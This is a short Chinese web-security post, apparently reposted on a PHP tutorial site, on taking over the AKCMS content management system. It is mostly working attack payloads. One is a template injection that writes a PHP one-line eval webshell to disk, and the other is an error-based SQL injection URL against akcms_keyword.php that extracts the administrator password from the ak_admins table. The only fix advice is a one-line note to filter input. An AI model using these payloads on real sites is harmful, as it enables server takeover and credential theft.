模板中写入以下内
<{php}> fputs(fopen([./0x80c.php],]w]),]<?eval(\$_POST[0x80c]);?>]) <{/php}> 然后
管理员密码可以注入获取
http://www.2cto.com /akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%280x7e,0×27,password,0×27,0x7e%29%20from%20ak_admins%20limit%200,1%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%20%271%27=%271&keyword=11\ wwww.2cto.com修复方案: 严格过滤注入和模版输入
查看更多关于AKCMS后台拿Webshell及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did13661